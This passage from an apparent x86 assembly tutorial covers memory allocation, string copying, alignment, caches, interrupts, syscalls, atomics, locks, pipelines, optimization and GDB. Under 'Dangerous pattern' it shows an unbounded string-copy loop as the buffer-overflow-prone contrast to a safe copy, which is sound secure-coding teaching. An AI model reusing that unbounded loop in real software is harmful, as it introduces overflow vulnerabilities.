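; Check against the end of the heap before updating heap_ptr,
; so a failed request leaves the allocator state untouched
mov rcx, heap_start + 0x100000
cmp rdx, rcx
ja .oom
mov [heap_ptr], rdx
pop rbp
ret
.oom:
xor eax, eax
pop rbp
ret
Buffer Overflows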
Dangerous pattern:
; Unsafe string copy
unsafe_copy:
mov rsi, source
mov rdi, dest
.copy:
mov al, [rsi]
mov [rdi], al
inc rsi
inc rdi
test al, al
jnz .copy
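ret
Safe Copy
; Safe string copy with bounds checking
; RSI = source, RDI = dest, RDX = size of the dest buffer in bytes
; Copies at most RDX-1 bytes and always null-terminates (when RDX > 0)
safe_copy:
push rbp
mov rbp, rsp
test rdx, rdx
jz .done ; zero-size buffer: nothing can be written
dec rdx ; reserve one byte for the terminator
xor ecx, ecx
.copy:
cmp rcx, rdx
jae .truncate ; buffer full
mov al, [rsi + rcx]
mov [rdi + rcx], al
test al, al
jz .done ; copied the null terminator
inc rcx
jmp .copy
.truncate:
mov byte [rdi + rcx], 0 ; terminate the truncated string
.done:
pop rbp
ret
Why Alignment Matters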
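Unaligned accesses can be:
- Slower (when they cross a cache line or page boundary)
- Illegal on some architectures (and for aligned SSE/AVX instructions such as MOVAPS on x86)
- Non-atomic (atomic operations generally require naturally aligned operands)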
Alignment Rules
- 1-byte: any address
- 2-byte: even address
- 4-byte: multiple of 4
- 8-byte: multiple of 8
- 16-byte: multiple of 16 (SSE)
- 32-byte: multiple of 32 (AVX)
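The rules above all reduce to the same bit arithmetic for power-of-two alignments. The following is a small sketch of that arithmetic; the helper names `align_up`, `align_down` and `is_aligned` are illustrative and not taken from any particular library.

```python
def _check_power_of_two(alignment: int) -> None:
    if alignment <= 0 or alignment & (alignment - 1):
        raise ValueError("alignment must be a positive power of two")


def align_up(value: int, alignment: int) -> int:
    """Round value up to the next multiple of alignment."""
    _check_power_of_two(alignment)
    return (value + alignment - 1) & ~(alignment - 1)


def align_down(value: int, alignment: int) -> int:
    """Round value down to the previous multiple of alignment."""
    _check_power_of_two(alignment)
    return value & ~(alignment - 1)


def is_aligned(value: int, alignment: int) -> bool:
    """True if value is a multiple of alignment."""
    _check_power_of_two(alignment)
    return value & (alignment - 1) == 0


print(hex(align_up(0x1003, 16)), hex(align_down(0x1003, 16)), is_aligned(0x1000, 32))
```

`align_up` is the add-then-mask pattern (add alignment minus one, then clear the low bits), and `align_down` is the plain mask that is typically applied to a stack pointer.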
Ensuring Alignment
; Align stack
and rsp, ~15 ; align to 16 bytes
; Align allocation
add rax, 15
and rax, ~15
; Data alignment in data section
section .data
align 16
vector: dd 1.0, 2.0, 3.0, 4.0
Cache Levels
Modern CPU cache hierarchy:
CPU Core
|
v
L1 Cache (32KB instruction + 32KB data)
| (fastest, ~4 cycles)
v
L2 Cache (256KB-1MB unified)
| (fast, ~12 cycles)
v
L3 Cache (8MB-30MB shared)
| (slower, ~30 cycles)
v
Main Memory (several GB)
| (slow, ~200+ cycles)
v
Disk (virtual memory)
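To see how much the hit rate at each level matters, the approximate latencies in the diagram can be combined into an expected access time. This is a rough sketch only: the hit rates below are made-up illustrative values, each latency is treated as the total cost of an access served by that level, and `expected_latency` is a hypothetical helper name.

```python
def expected_latency(levels, memory_latency):
    """Expected cycles per access.

    levels: list of (latency_cycles, hit_rate) ordered from L1 outward.
    memory_latency: cycles for an access that misses every cache level.
    """
    expected = 0.0
    reach = 1.0  # probability that an access gets this far down the hierarchy
    for latency, hit_rate in levels:
        expected += reach * hit_rate * latency
        reach *= 1.0 - hit_rate
    return expected + reach * memory_latency


# Latencies from the diagram above; hit rates are assumptions for illustration.
levels = [(4, 0.90), (12, 0.90), (30, 0.90)]
print(round(expected_latency(levels, 200), 2))
```

Under this simple model the main-memory term is weighted by the product of all miss rates, which is why even small improvements in locality pay off.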
Cache Lines
Memory is transferred between main memory and the caches in cache lines (typically 64 bytes):
; Access pattern matters
; Bad: large stride, every access touches a different cache line
mov rcx, 1000
xor rax, rax
.strided:
add rax, [rsi]
add rsi, 4096 ; jump a full page each iteration
loop .strided
; Good: sequential access, eight qwords share each cache line
mov rcx, 1000
xor rax, rax
.sequential:
add rax, [rsi]
add rsi, 8
loop .sequential
Cache-Friendly Code
- Spatial locality: Access nearby memory
- Temporal locality: Reuse data while cached
- Stride patterns: Avoid large strides
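The effect of stride on spatial locality can be made concrete by counting how many distinct cache lines a traversal touches. This is a sketch under simple assumptions (64-byte lines, 8-byte elements, no prefetcher or associativity effects); `lines_touched` is an illustrative name.

```python
def lines_touched(base: int, stride: int, count: int,
                  elem_size: int = 8, line_size: int = 64) -> int:
    """Count distinct cache lines touched by `count` accesses of `elem_size`
    bytes, starting at `base` and advancing `stride` bytes each time."""
    touched = set()
    for i in range(count):
        addr = base + i * stride
        touched.add(addr // line_size)
        # An element that straddles a boundary touches the next line too.
        touched.add((addr + elem_size - 1) // line_size)
    return len(touched)


sequential = lines_touched(base=0, stride=8, count=1000)
strided = lines_touched(base=0, stride=8000, count=1000)
print(sequential, strided)
```

With a stride of 8 bytes, eight elements share each line; with a stride of 8000 bytes (one row of a 1000-column matrix of 8-byte elements), every access lands on a different line.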
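Matrix Traversal Example
Bad (column-major access):
; Access pattern: matrix[j][i] - poor locality
; matrix holds 1000 x 1000 qwords, so one row is 8000 bytes
; (x86 addressing only allows scale factors 1, 2, 4, 8, so the row offset is kept in a pointer)
xor ecx, ecx ; i = column
.outer:
lea rdi, [matrix + rcx*8] ; &matrix[0][i]
xor edx, edx ; j = row
.inner:
mov rax, [rdi] ; matrix[j][i]
add rdi, 8000 ; next row: large stride
inc rdx
cmp rdx, 1000
jl .inner
inc rcx
cmp rcx, 1000
jl .outer
Good (row-major access):
; Access pattern: matrix[i][j] - good locality
mov rdi, matrix ; &matrix[0][0]
xor ecx, ecx ; i = row
.outer:
xor edx, edx ; j = column
.inner:
mov rax, [rdi + rdx*8] ; matrix[i][j], sequential
inc rdx
cmp rdx, 1000
jl .inner
add rdi, 8000 ; next row
inc rcx
cmp rcx, 1000
jl .outer
Cache Blocking (Tiling)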
// Cache blocking for matrix multiplication
for (int i = 0; i < N; i += BLOCK)
for (int j = 0; j < N; j += BLOCK)
for (int k = 0; k < N; k += BLOCK)
// Multiply block
for (int ii = i; ii < i + BLOCK; ii++)
for (int jj = j; jj < j + BLOCK; jj++)
for (int kk = k; kk < k + BLOCK; kk++)
C[ii][jj] += A[ii][kk] * B[kk][jj];
Hardware interrupts signal events from devices.
Interrupt Vector Table (IVT) in real mode:
- 256 entries
- Each entry: 4 bytes (segment:offset)
- Located at physical address 0
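Because every IVT entry is 4 bytes and the table starts at address 0, the location of an entry follows directly from the vector number. The sketch below works through that arithmetic; the function names are illustrative.

```python
import struct


def ivt_entry_address(vector: int) -> int:
    """Physical address of the real-mode IVT entry for an interrupt vector."""
    if not 0 <= vector <= 255:
        raise ValueError("vector must be in 0..255")
    return vector * 4


def encode_ivt_entry(segment: int, offset: int) -> bytes:
    """Pack an entry as stored in memory: 16-bit offset first, then segment."""
    return struct.pack("<HH", offset, segment)


def linear_address(segment: int, offset: int) -> int:
    """Real-mode address of the handler: segment * 16 + offset."""
    return (segment << 4) + offset


print(hex(ivt_entry_address(0x10)), hex(ivt_entry_address(0x40)))
print(encode_ivt_entry(0x0000, 0x7C20).hex(), hex(linear_address(0x07C0, 0x0020)))
```

For example, the entry for INT 0x40 lives at 0x100 (offset word) and 0x102 (segment word).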
Interrupt Descriptor Table (IDT) in protected/long mode:
- 256 entries
- Each entry: 16 bytes (64-bit mode)
IDT Entry Format (64-bit)
Bytes 0-1: Offset low (15:0)
Bytes 2-3: Segment selector
Byte 4: IST (bits 0-2), reserved (bits 3-7)
Byte 5: Type and attributes
Bit 7: Present
Bits 6-5: DPL (Descriptor Privilege Level)
Bit 4: Reserved (0)
Bits 3-0: Gate Type
0xE = 64-bit interrupt gate
0xF = 64-bit trap gate
(in 32-bit protected mode: 0x5 = task gate, 0xE = 32-bit interrupt gate, 0xF = 32-bit trap gate)
Bytes 6-7: Offset middle (31:16)
Bytes 8-11: Offset high (63:32)
Bytes 12-15: Reserved (0)
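A 16-byte long-mode gate descriptor can be assembled field by field. The sketch below assumes the layout given in the Intel and AMD architecture manuals (offset 15:0, selector, IST byte, type/attribute byte, offset 31:16, offset 63:32, reserved dword). `encode_idt_gate64` is a hypothetical helper, and the handler address is an arbitrary example value.

```python
import struct


def encode_idt_gate64(handler: int, selector: int = 0x08, ist: int = 0,
                      gate_type: int = 0xE, dpl: int = 0,
                      present: bool = True) -> bytes:
    """Build one 16-byte IDT gate descriptor for 64-bit mode."""
    type_attr = (0x80 if present else 0) | ((dpl & 0x3) << 5) | (gate_type & 0xF)
    return struct.pack(
        "<HHBBHII",
        handler & 0xFFFF,              # offset 15:0
        selector,                      # code segment selector
        ist & 0x7,                     # IST index, upper bits reserved
        type_attr,                     # P, DPL, gate type
        (handler >> 16) & 0xFFFF,      # offset 31:16
        (handler >> 32) & 0xFFFFFFFF,  # offset 63:32
        0,                             # reserved
    )


entry = encode_idt_gate64(0xFFFFFFFF80123456)
print(len(entry), entry.hex())
```

With the default arguments the type/attribute byte comes out as 0x8E: present, ring 0, interrupt gate.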
Loading IDT
; Load IDT register
lidt [idtr]
; IDTR format
idtr:
dw 256*16 - 1 ; limit (size - 1)
dq idt ; base address
Common Hardware Interrupts
- IRQ0: Programmable Interval Timer
- IRQ1: Keyboard
- IRQ2: Cascade for IRQ8-15
- IRQ3: COM2
- IRQ4: COM1
- IRQ6: Floppy disk
- IRQ8: RTC
- IRQ12: PS/2 Mouse
- IRQ14: Primary ATA
- IRQ15: Secondary ATA
Software interrupts are triggered by the INT instruction.
INT Instruction
int 0x80 ; software interrupt
int3 ; breakpoint interrupt (single-byte 0xCC)
into ; interrupt on overflow (not available in 64-bit mode)
Common Software Interrupts
- INT 0x10: BIOS video services
- INT 0x13: BIOS disk services
- INT 0x16: BIOS keyboard services
- INT 0x21: DOS services
- INT 0x80: Linux syscall (32-bit)
- INT 0x2E: Windows syscall
32-bit Linux Syscalls
Using int 0x80:
; Syscall numbers in /usr/include/asm/unistd_32.h
; Arguments: EBX, ECX, EDX, ESI, EDI, EBP
; EAX = syscall number
section .data
msg db 'Hello', 10
len equ $ - msg
section .text
global _start
_start:
; write(1, msg, len)
mov eax, 4 ; sys_write
mov ebx, 1 ; stdout
mov ecx, msg
mov edx, len
int 0x80
; exit(0)
mov eax, 1 ; sys_exit
xor ebx, ebx
int 0x80
64-bit Linux Syscalls
Using syscall instruction:
; Syscall numbers in /usr/include/asm/unistd_64.h
; Arguments: RDI, RSI, RDX, R10, R8, R9
; RAX = syscall number
; RCX and R11 are clobbered (SYSCALL stores the return RIP in RCX and RFLAGS in R11)
section .data
msg db 'Hello', 10
len equ $ - msg
section .text
global _start
_start:
; write(1, msg, len)
mov rax, 1 ; sys_write
mov rdi, 1 ; stdout
mov rsi, msg
mov rdx, len
syscall
; exit(0)
mov rax, 60 ; sys_exit
xor rdi, rdi
syscall
Common Syscall Numbers (x86-64)
| RAX | Name | RDI | RSI | RDX | R10 | R8 | R9 |
|---|---|---|---|---|---|---|---|
| 0 | read | fd | buf | count | - | - | - |
| 1 | write | fd | buf | count | - | - | - |
| 2 | open | path | flags | mode | - | - | - |
| 3 | close | fd | - | - | - | - | - |
| 9 | mmap | addr | len | prot | flags | fd | off |
| 10 | mprotect | addr | len | prot | - | - | - |
| 12 | brk | addr | - | - | - | - | - |
| 39 | getpid | - | - | - | - | - | - |
| 57 | fork | - | - | - | - | - | - |
| 60 | exit | status | - | - | - | - | - |
| 63 | uname | buf | - | - | - | - | - |
Windows Syscall Mechanism
Windows uses sysenter for fast syscalls (32-bit) and syscall (64-bit).
Calling Windows API
; Windows x64 assembly (MASM)
extern ExitProcess: PROC
extern WriteFile: PROC
extern GetStdHandle: PROC
.data
msg db "Hello, World!", 13, 10
len equ $ - msg
written dq ?
.code
main PROC
sub rsp, 38h ; 32 bytes shadow space + 8 for the fifth argument + 16 padding keeps RSP 16-byte aligned
; GetStdHandle(STD_OUTPUT_HANDLE)
mov ecx, -11 ; STD_OUTPUT_HANDLE
call GetStdHandle
; WriteFile(handle, msg, len, &written, NULL)
mov rcx, rax ; handle
lea rdx, msg ; buffer
mov r8d, len ; length
lea r9, written ; bytes written
mov qword ptr [rsp+20h], 0 ; lpOverlapped (fifth argument, just above the shadow space)
call WriteFile
; ExitProcess(0)
xor ecx, ecx
call ExitProcess
main ENDP
END
Windows Syscall Numbers
Syscall numbers change between Windows versions. Each number is an index into the System Service Dispatch Table (SSDT), so code that hard-codes them is tied to a specific build.
Simple Interrupt Handler (Real Mode)
; Real mode interrupt handler
[org 0x7C00]
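; Set up IVT entry for INT 0x40 (entry address = 0x40 * 4 = 0x100)
cli
xor ax, ax
mov ds, ax
mov word [0x100], custom_handler ; offset
mov word [0x102], ax ; segment 0 (matches org 0x7C00)
sti
; Main program: raise the interrupt once, then hang
int 0x40
jmp $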
custom_handler:
pusha
; Handle interrupt
mov si, msg
call print_string
popa
iret
msg db "Interrupt handled!", 0
; Print string function
print_string:
lodsb
or al, al
jz .done
mov ah, 0x0E
int 0x10
jmp print_string
.done:
ret
times 510-($-$$) db 0
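dw 0xAA55
Protected Mode IDT Setup
; Set up IDT in protected mode (32-bit, 8-byte gate descriptors)
idt_start:
; Interrupt gate for the timer, shown as the first entry for brevity
; (IRQ0 normally arrives at whatever vector the PIC is remapped to, commonly 0x20)
; The offset fields are left zero and patched at run time,
; because NASM cannot apply & or >> to a relocatable label
dw 0 ; offset 15:0 (patched below)
dw 0x08 ; segment selector (code)
db 0 ; reserved
db 0x8E ; present, ring 0, 32-bit interrupt gate
dw 0 ; offset 31:16 (patched below)
; ... more entries ...
idt_end:
idtr:
dw idt_end - idt_start - 1 ; limit
dd idt_start ; base (32-bit)
; Patch the handler address into the entry, then load the IDT
mov eax, handler_timer
mov [idt_start], ax
shr eax, 16
mov [idt_start + 6], ax
lidt [idtr]
Interrupt Handler in Protected Mode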
; Interrupt handler - must save all registers
handler_timer:
pusha
push ds
push es
push fs
push gs
; Set up kernel data segments
mov ax, 0x10 ; kernel data selector
mov ds, ax
mov es, ax
; Handle interrupt
inc dword [timer_ticks]
; Send EOI to PIC
mov al, 0x20
out 0x20, al
; Restore registers
pop gs
pop fs
pop es
pop ds
popa
iret ; return from interrupt
Interrupt Handler in Long Mode
; 64-bit interrupt handler
handler_timer:
; Save all registers
push rax
push rbx
push rcx
push rdx
push rsi
push rdi
push rbp
push r8
push r9
push r10
push r11
push r12
push r13
push r14
push r15
; Handle interrupt
inc qword [timer_ticks]
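; Send EOI to the local APIC (assumes the default base 0xFEE00000 is identity-mapped)
mov ecx, 0xFEE000B0 ; APIC EOI register; a 32-bit mov zero-extends into RCX
mov dword [rcx], 0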
; Restore registers
pop r15
pop r14
pop r13
pop r12
pop r11
pop r10
pop r9
pop r8
pop rbp
pop rdi
pop rsi
pop rdx
pop rcx
pop rbx
pop rax
iretq ; 64-bit return from interrupt
Atomic operations are indivisible - they appear to execute as a single unit.
LOCK Prefix
lock inc dword [counter] ; atomic increment
lock xadd [counter], eax ; atomic exchange and add
lock cmpxchg [mem], ebx ; atomic compare and exchange
lock bts dword [mem], 5 ; atomic bit test and set
XCHG is Implicitly Locked
xchg eax, [mem] ; always atomic (LOCK implied)
CMPXCHG (Compare and Exchange)
; Compare EAX with [mem], if equal set [mem]=EBX
; else load [mem] into EAX
lock cmpxchg [mem], ebx
; Example: atomic increment
retry:
mov eax, [counter]
mov ebx, eax
inc ebx
lock cmpxchg [counter], ebx
jne retry ; ZF clear: [counter] changed since the load, try again
Atomic Operations in C
// GCC atomic builtins
__sync_fetch_and_add(&counter, 1);
__sync_lock_test_and_set(&flag, 1);
__sync_bool_compare_and_swap(&ptr, old, new);
// C11 atomics
#include <stdatomic.h>
atomic_int counter;
atomic_fetch_add(&counter, 1);
Spinlock Implementation
; Simple spinlock
; lock_var is a dword: 0 = free, 1 = held
; ("lock" itself is an instruction prefix, so it cannot be used as a label)
spinlock:
mov eax, 1
xchg eax, [lock_var] ; try to acquire
test eax, eax
jnz spinlock ; if already locked, spin
ret
spinunlock:
mov dword [lock_var], 0
ret
Improved Spinlock with PAUSE
spinlock:
mov eax, 1
xchg eax, [lock_var]
test eax, eax
jz .acquired ; got lock
.spin:
pause ; spin-wait hint: saves power and helps the sibling hyper-thread
cmp dword [lock_var], 0
jne .spin
jmp spinlock ; try again
.acquired:
ret
Ticket Lock
Fairer than a plain spinlock, because waiters are served in arrival order:
; Ticket lock structure
struc ticket_lock
.current resd 1 ; current ticket serving
.next resd 1 ; next ticket to issue
endstruc
; tlock is a zero-initialized instance of ticket_lock
; Acquire lock
ticket_lock_acquire:
mov eax, 1
lock xadd [tlock + ticket_lock.next], eax ; get ticket
; EAX now has our ticket number
.spin:
pause
cmp eax, [tlock + ticket_lock.current]
jne .spin
ret
; Release lock
ticket_lock_release:
lock inc dword [tlock + ticket_lock.current]
ret
Memory barriers prevent reordering of memory operations.
MFENCE (Memory Fence)
mfence ; orders all earlier loads and stores before all later ones
lfence ; orders loads
sfence ; orders stores
When Barriers Are Needed
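; Producer thread
mov dword [data], 1
sfence ; ensure data visible before flag
; (required for non-temporal or write-combining stores;
; ordinary x86 stores already become visible in program order)
mov dword [flag], 1
; Consumer thread
.wait:
pause
cmp dword [flag], 0
je .wait
lfence ; ensure flag read before data (ordinary x86 loads are already ordered)
mov eax, [data] ; guaranteed to see data=1
Thread Local Storage (TLS) provides per-thread variables.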
x86-64 TLS Implementation
Using FS segment register on Linux:
; Access TLS variable (offset in FS)
mov rax, [fs:0] ; thread pointer
mov rbx, [fs:tls_var_offset]
Setting FS Base
; Set FS base address (privileged)
mov ecx, 0xC0000100 ; MSR_FS_BASE
mov eax, [thread_struct] ; low 32 bits
mov edx, [thread_struct+4] ; high 32 bits
wrmsr
; Using WRFSBASE instruction (if CR4.FSGSBASE set)
wrfsbase rax ; set FS base to RAX
TLS in C
// Thread-local variable
__thread int tls_var;
// Access becomes:
// mov eax, [fs:tls_var_offset]
Semaphore Implementation
; Semaphore structure
struc semaphore
.count resd 1 ; current count
.waiters resd 1 ; wait queue (simplified)
endstruc
; Wait (P operation)
sem_wait:
.retry:
mov eax, [sem + semaphore.count]
test eax, eax
jle .busy ; no permits available
lea edx, [rax - 1] ; proposed new count
lock cmpxchg [sem + semaphore.count], edx ; commit only if count is still EAX
jne .retry ; another thread changed the count first
ret
.busy:
; Simplified: spin until a permit appears
; A real OS would add the thread to the wait queue and yield
pause
jmp .retry
; Signal (V operation)
sem_signal:
lock inc dword [sem + semaphore.count]
; Wake up waiters (if any)
ret
Reader-Writer Lock
; Reader-writer lock structure
struc rwlock
.readers resd 1 ; number of readers
.writer resd 1 ; writer flag
endstruc
; rw is a zero-initialized instance of rwlock
; (the struc name itself is only an offset base, not a variable)
; Reader lock
read_lock:
.loop:
mov eax, [rw + rwlock.writer]
test eax, eax
jnz .loop ; writer active, spin
lock inc dword [rw + rwlock.readers]
; Check if writer started while we incremented
cmp dword [rw + rwlock.writer], 0
je .acquired
; Writer started, undo increment and retry
lock dec dword [rw + rwlock.readers]
pause
jmp .loop
.acquired:
ret
; Reader unlock
read_unlock:
lock dec dword [rw + rwlock.readers]
ret
; Writer lock
write_lock:
mov eax, 1
xchg [rw + rwlock.writer], eax ; XCHG with memory is implicitly locked
test eax, eax
jz .drain ; got the writer flag
pause
jmp write_lock ; another writer holds it, retry
; Wait for active readers to finish before entering
.drain:
cmp dword [rw + rwlock.readers], 0
je .acquired
pause
jmp .drain
.acquired:
ret
; Writer unlock
write_unlock:
mov dword [rw + rwlock.writer], 0
ret
Condition Variable
; Wait on condition
cond_wait:
; Must have mutex locked
; Release mutex and block
; On wake, reacquire mutex
; Simplified - just spin until the condition is signaled
.wait:
pause
mov eax, [cond]
test eax, eax
jz .wait
ret
; Signal condition
cond_signal:
mov dword [cond], 1
ret
A pipeline allows multiple instructions to be processed simultaneously.
Classic 5-Stage RISC Pipeline
Stage 1: IF (Instruction Fetch)
Stage 2: ID (Instruction Decode)
Stage 3: EX (Execute)
Stage 4: MEM (Memory Access)
Stage 5: WB (Write Back)
Clock 1: IF1
Clock 2: ID1 IF2
Clock 3: EX1 ID2 IF3
Clock 4: MEM1 EX2 ID3 IF4
Clock 5: WB1 MEM2 EX3 ID4 IF5
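The staircase above can be generated mechanically: instruction n enters stage s in clock n + s. A minimal sketch of an ideal pipeline with no stalls follows; `pipeline_schedule` and `total_cycles` are illustrative names.

```python
STAGES = ["IF", "ID", "EX", "MEM", "WB"]


def pipeline_schedule(num_instructions: int):
    """Return, for each clock, the stage occupied by each in-flight instruction
    in an ideal pipeline (no stalls, one instruction issued per clock)."""
    rows = []
    for clock in range(num_instructions + len(STAGES) - 1):
        row = []
        for instr in range(num_instructions):
            stage = clock - instr
            if 0 <= stage < len(STAGES):
                row.append(f"{STAGES[stage]}{instr + 1}")
        rows.append(row)
    return rows


def total_cycles(num_instructions: int) -> int:
    """Cycles to finish n instructions: fill the pipe once, then one per clock."""
    return num_instructions + len(STAGES) - 1


for clock, row in enumerate(pipeline_schedule(5), start=1):
    print(f"Clock {clock}: " + " ".join(row))
```

For a long instruction stream the fill time becomes negligible, so throughput approaches one instruction per clock even though each instruction still takes five clocks from fetch to write-back.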
x86 Pipeline Complexity
Modern x86 pipelines have 14-20+ stages:
- Frontend: Fetch, decode, micro-op generation
- Out-of-order engine: Register renaming, scheduler
- Execution: Multiple execution units
- Retirement: Reorder buffer, commit
Superscalar processors can execute multiple instructions per cycle.
Issue Width
- Pentium: 2 instructions
- Core architecture: 4-6 micro-ops
- Modern CPUs: 4-8 micro-ops
Execution Units
Typical modern CPU:
- 2-4 integer ALUs
- 2-3 load/store units
- 2-3 FP/SIMD units
- Branch units
Resource Constraints
; Can execute together (different units)
add eax, ebx ; ALU0
mov [mem], ecx ; Store unit
addsd xmm0, xmm1 ; FP unit
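; Compete for the same kind of unit
; (on a core with a single free ALU the second one waits a cycle;
; with several ALUs both can still issue together)
add eax, ebx ; ALU0
sub ecx, edx ; ALU0 if no other ALU is free
Branches can stall the pipeline if mispredicted.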
Static Prediction
Older CPUs used simple rules:
- Forward branches: not taken
- Backward branches: taken (loop)
Dynamic Prediction
Modern CPUs use sophisticated predictors:
- Branch Target Buffer (BTB)
- Global history
- Pattern history tables
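The building block behind many of these structures is a small saturating counter per branch. As a sketch of one classic scheme (a 2-bit counter, not a model of any specific CPU's predictor), the simulation below counts correct predictions for a sequence of branch outcomes; `simulate_two_bit` is an illustrative name.

```python
def simulate_two_bit(outcomes, state: int = 2) -> int:
    """Simulate a 2-bit saturating counter predictor.

    States 0-1 predict not taken, states 2-3 predict taken.
    Returns the number of correct predictions.
    """
    correct = 0
    for taken in outcomes:
        if (state >= 2) == taken:
            correct += 1
        # Move toward 3 on taken, toward 0 on not taken, saturating at both ends.
        state = min(state + 1, 3) if taken else max(state - 1, 0)
    return correct


loop_branch = [True] * 999 + [False]   # loop back-edge: taken 999 times, then exits
alternating = [True, False] * 500      # pattern a lone counter cannot learn
print(simulate_two_bit(loop_branch), simulate_two_bit(alternating))
```

A loop back-edge is predicted almost perfectly, while a strictly alternating branch defeats a lone counter; history-based predictors exist to capture patterns like the second one.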
Branch Prediction Example
; Well-predicted loop
mov ecx, 1000
.loop:
; do work
dec ecx
jnz .loop ; taken 999 times, not taken once
; Hard-to-predict branch
cmp eax, ebx
je .target ; random data makes prediction difficult
Avoiding Branches
Use conditional moves for simple branches:
; Instead of:
cmp eax, ebx
jg .greater
mov ecx, edx
jmp .done
.greater:
mov ecx, esi
.done:
; Use:
cmp eax, ebx
cmovg ecx, esi ; if >, use esi
cmovle ecx, edx ; if <=, use edx
Out-of-order execution allows instructions to execute as soon as their operands are ready.
Example
; In-order execution would stall:
mov eax, [mem] ; long latency load
add ebx, eax ; must wait for eax
add ecx, edx ; independent, but blocked in-order
; Out-of-order can execute:
mov eax, [mem] ; starts, then stalls waiting for cache
add ecx, edx ; executes while waiting
add ebx, eax ; executes when eax ready
Register Renaming
Eliminates false dependencies:
; Write-after-write (WAW) dependency
add eax, ebx
mov eax, ecx ; can rename to different physical register
; Write-after-read (WAR) dependency
mov eax, [mem]
add ebx, eax
mov eax, edx ; can rename
Reorder Buffer (ROB)
Tracks instruction state until retirement:
- Allocates entry for each instruction
- Holds results until commit
- Enables precise exceptions
CISC instructions are broken into simpler micro-ops.
x86 to Micro-op Translation
; Complex instruction:
add eax, [mem] ; breaks into:
; micro-op 1: load from mem into temp
; micro-op 2: add temp to eax
Micro-op Fusion
Multiple micro-ops can be fused:
; Macro-op fusion
cmp eax, ebx
je .target ; fuses into single compare-and-branch micro-op
; Micro-op fusion
add eax, [mem] ; fused load+add micro-op
Micro-op Cache
Caches decoded micro-ops to bypass frontend:
- Faster than re-decoding
- Power efficient
- Typical size: 1.5K-6K micro-ops
Register Allocation
Prioritize register usage:
- Most frequent variables in registers
- Avoid spilling to stack
- Use callee-saved registers for persistent values
Zeroing Idioms
; Best: xor same register
xor eax, eax ; 2 bytes, recognized by CPU
; Good: sub same register
sub eax, eax ; 2 bytes
; Avoid: mov immediate
mov eax, 0 ; 5 bytes, not treated as a zeroing idiom
Register Selection
; Prefer 32-bit operands: a 32-bit write zeroes the upper half of the
; 64-bit register, so it carries no dependency on the old value
mov eax, 1
add ebx, ecx
; Avoid partial register stalls
mov al, [mem] ; partial write, then
add eax, ebx ; may stall or need a merge of the upper bytes
; Zero-extend instead of writing only the low byte
movzx eax, byte [mem]
Reduce loop overhead by doing more work per iteration.
Before Unrolling
mov ecx, 1000
xor eax, eax
.loop:
add eax, [rsi]
add rsi, 4
dec ecx
jnz .loop
After Unrolling (4x)
mov ecx, 250 ; 1000/4 iterations
xor eax, eax
.loop:
add eax, [rsi]
add eax, [rsi+4]
add eax, [rsi+8]
add eax, [rsi+12]
add rsi, 16
dec ecx
jnz .loop
Duff's Device in Assembly
; Handle the remainder (count mod 4) with a jump table
mov ecx, 1000 ; element count
xor eax, eax ; accumulator
mov edx, ecx
and edx, 3 ; remainder (kept in EDX so the accumulator is not overwritten)
jmp [jump_table + rdx*8]
jump_table:
dq .case0
dq .case1
dq .case2
dq .case3
.case3:
add eax, [rsi]
add rsi, 4
dec ecx
.case2:
add eax, [rsi]
add rsi, 4
dec ecx
.case1:
add eax, [rsi]
add rsi, 4
dec ecx
.case0:
; main loop: ECX is now a multiple of 4
Process multiple data elements with one instruction.
SSE Example: Adding Arrays
; Add 4 floats at a time
mov ecx, 1024 ; array size
shr ecx, 2 ; 1024/4 iterations
xor rsi, rsi
.loop:
movaps xmm0, [array1 + rsi]
addps xmm0, [array2 + rsi]
movaps [result + rsi], xmm0
add rsi, 16 ; 4 floats * 4 bytes
dec ecx
jnz .loop
AVX Example: 8 Floats
vmovaps ymm0, [array1 + rsi]
vaddps ymm0, ymm0, [array2 + rsi]
vmovaps [result + rsi], ymm0
Automatic Vectorization
Compilers can auto-vectorize:
// Compiler may generate SIMD
for (int i = 0; i < 1024; i++) {
c[i] = a[i] + b[i];
}
Prefetching
; Software prefetch
prefetcht0 [rsi + 64] ; prefetch into all cache levels
prefetcht1 [rsi + 128] ; prefetch into L2 and L3
prefetcht2 [rsi + 192] ; prefetch into L3 only
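prefetchnta [rsi + 256] ; prefetch into L1, minimize cache pollution
Cache Blocking Example
; Matrix multiplication with blocking (loop skeleton only)
; N and BLOCK are assemble-time constants; N is a multiple of BLOCK
xor rbx, rbx ; i = start of current row block
.outer_block_i:
xor rdx, rdx ; j = start of current column block
.outer_block_j:
xor rsi, rsi ; k = start of current inner block
.outer_block_k:
; Multiply one BLOCK x BLOCK tile
mov r8, BLOCK
.inner_i:
mov r9, BLOCK
.inner_j:
; Compute one element (innermost kk loop omitted)
dec r9
jnz .inner_j
dec r8
jnz .inner_i
add rsi, BLOCK
cmp rsi, N
jl .outer_block_k
add rdx, BLOCK
cmp rdx, N
jl .outer_block_j
add rbx, BLOCK
cmp rbx, N
jl .outer_block_i
Data Alignment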
; Align data to cache line boundaries
section .data
align 64
cache_aligned_data:
times 1024 dq 0
RDTSC Timing
; Measure cycles
rdtsc
mov [start_lo], eax
mov [start_hi], edx
; Code to measure
rdtsc
sub eax, [start_lo]
sbb edx, [start_hi]
; EDX:EAX = cycles
Performance Counter Access
; Read performance counter
mov ecx, 0 ; counter number
rdpmc ; read EDX:EAX
Profiling with perf
# Sample on counter overflow
perf record -e cycles ./program
perf report
# Cache misses
perf stat -e cache-misses ./program
Examining Compiler Output
# Generate assembly listing
gcc -S -O2 program.c -o program.s
# With Intel syntax
gcc -S -O2 -masm=intel program.c
Common Compiler Optimizations
Constant folding:
// Original
int x = 10 + 20;
// Optimized
int x = 30;
Constant propagation:
// Original
int a = 5;
int b = a * 2;
// Optimized
int b = 10;
Strength reduction:
// Original
x * 8
// Optimized
x << 3
// Original
x / 4
// Optimized (unsigned)
x >> 2
Common subexpression elimination:
// Original
a = b * c + d;
e = b * c + f;
// Optimized
t = b * c;
a = t + d;
e = t + f;
Compiler Optimizations in Assembly
; Original C: *p++ = *q++ + 1
; Unoptimized:
mov eax, [rsi]
add eax, 1
mov [rdi], eax
add rsi, 4
add rdi, 4
; Optimized (-O2):
mov eax, [rsi]
add eax, 1
mov [rdi], eax
add rsi, 4
add rdi, 4
; (similar, but may reorder or use different registers)
Basic Commands
# Start debugging
gdb ./program
# Set breakpoint
break main
break *0x4004a6
# Run program
run
run arg1 arg2
# Examine registers
info registers
print $rax
x/x $rsp # examine memory
# Step through
stepi # instruction step
nexti # step over calls
continue # continue execution
# Disassemble
disas main
disas /r main # show raw bytes
# Examine memory
x/10x $rsp # 10 hex words
x/10i $rip # 10 instructions
GDB Scripting
# gdb.py - Python scripting
import gdb
